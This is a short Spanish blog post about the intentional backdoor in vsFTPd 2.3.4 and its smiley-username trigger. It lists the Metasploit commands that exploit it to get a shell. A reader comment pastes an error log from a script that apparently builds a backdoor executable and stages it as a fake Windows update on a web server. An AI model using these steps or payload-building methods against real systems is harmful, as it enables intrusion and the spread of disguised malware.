Bueno, ante todo perdon por la inactividad que hemos tenido estos meses pasados.
Hace poco se descubrió una grave vulnerabilidad en el servidor vsFTPd v2.3.4, y en el blog de Blackploit han publicado un vídeo de su explotación con metasploit.
El bug encontrado es una puerta trasera creada intencionadamente por el creador con el cual se puede acceder al FTP con permisos de administrador.
El Backdoor consiste en que accediendo al FTP y poniendo de usuario 🙂 se conseguía acceso total y ejecución de comandos en el servidor al devolver una shell del sistema. Así de simple.
Como ya os imagináis no hace falta metasploit… pero bueno.
Pasos:
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST localhost
set PAYLOAD cmd/unix/interact
exploit
id
uname -a
Fuente: blackploit
Mas información:
El smile de la muerte: Puerta trasera en vsftpd 2.3.4
Las puertas traseras más escandalosas
Y la solucion ????
hey bro your script not work on btakcrack 5 r 2 > Encoding and compiling, this might take a while mv: cannot stat `final.exe’: No such file or directoryfinal.c > finished compiling to folder: seclabs/final.c > sha1checksum is 914c30e5fc2b7bbda20b4fc15a4cbd1152ae9ce9 final.cstrip:final.c: File format not recognized> Copying the file to /var/www/ and creating update.zipcp: cannot stat `seclabs/backdoor.exe’: No such file or directorycp: cannot stat `seclabs/backdoor.exe’: No such file or directoryzip warning: name not matched: winupdate.exewhat shoult i do?